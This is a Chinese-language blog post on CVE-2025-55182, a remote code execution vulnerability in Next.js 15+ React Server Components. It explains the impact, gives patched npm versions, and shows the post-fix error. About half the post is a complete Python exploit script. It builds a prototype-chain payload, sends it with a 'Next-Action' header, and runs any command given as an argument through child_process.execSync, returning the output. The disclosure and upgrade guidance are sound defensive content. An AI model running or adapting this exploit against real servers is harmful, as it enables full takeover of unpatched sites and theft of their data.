Next.JS RSC漏洞 - CVE-2025-55182 10.0分 以及测试脚本
Next.JS 15以上版本默认使用App Router(React Server Components)进行渲染,CVE-2025-55182漏洞会导致可以向服务器端发送可执行指令并在服务器端运行。
使用NextJS 15以上构建的项目挺多的,包括umami、lobechat等等。
比如下方代码,如果服务器是Windows,则会打开计算器(calc)。
修复方法也很简单,升级到React 和 NextJS 最新版本即可。
其实看到这个漏洞第一时间就已经修复了,只不过后面看到github上的测试脚本自己手动测试了一下,感到非常后怕。再联想到最近AWS、Cloudflare以及阿里云的频繁崩溃,只能说咱们互联网的基础设施还真就是个草台班子,能跑进行hhh
# /// script
# dependencies = ["requests"]
# ///
import requests
import sys
import json
BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
EXECUTABLE = sys.argv[2] if len(sys.argv) > 2 else "calc"
crafted_chunk = {
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": '{"then": "$B0"}',
"_response": {
"_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
# If you don't need the command output, you can use this line instead:
# "_prefix": f"process.mainModule.require('child_process').execSync('{EXECUTABLE}');",
"_formData": {
"get": "$1:constructor:constructor",
},
},
}
files = {
"0": (None, json.dumps(crafted_chunk)),
"1": (None, '"$@0"'),
}
headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)
print(res.status_code)
print(res.text)
升级后再次进行请求则会提示
Error: Failed to find Server Action "x". This request might be from an older or newer deployment.
Read more: https://nextjs.org/docs/messages/failed-to-find-server-action
at async m (xx\.next\standalone\.next\server\app\page.js:1:9014)
at async p (xx\.next\standalone\.next\server\app\page.js:2:1860)
at async L (xx\.next\standalone\.next\server\app\page.js:2:6944)
升级脚本
npm install next@15.0.5 # for 15.0.x
npm install next@15.1.9 # for 15.1.x
npm install next@15.2.6 # for 15.2.x
npm install next@15.3.6 # for 15.3.x
npm install next@15.4.8 # for 15.4.x
npm install next@15.5.7 # for 15.5.x
npm install next@16.0.7 # for 16.0.x